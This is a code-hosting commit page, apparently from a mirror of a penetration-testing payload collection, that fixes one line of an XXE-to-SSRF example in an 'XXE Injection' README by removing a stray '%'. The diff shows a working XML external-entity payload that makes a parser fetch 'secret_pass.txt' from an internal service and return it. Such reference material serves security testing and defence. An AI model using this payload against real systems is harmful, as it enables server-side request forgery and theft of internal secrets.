admin/PayloadsAllTHINGS
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

correction of xxe ssrf payload

Browse Source 
remove the % from the payload as it's not a parametrized entity
This commit is contained in:
piranha
2025-09-09 19:16:45 +01:00
committed by GitHub
parent b391de2117
commit aa85b80ace
1 changed files with 1 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
XXE Injection/README.md
View File

@@ -155,7 +155,7 @@ XXE can be combined with the [SSRF vulnerability](https://github.com/swisskyrepo
<?xml version="1.0" encoding="ISO-8859-1"?> <?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
<!ELEMENT foo ANY > <!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://internal.service/secret_pass.txt" > <!ENTITY xxe SYSTEM "http://internal.service/secret_pass.txt" >
]> ]>
<foo>&xxe;</foo> <foo>&xxe;</foo>
``` ```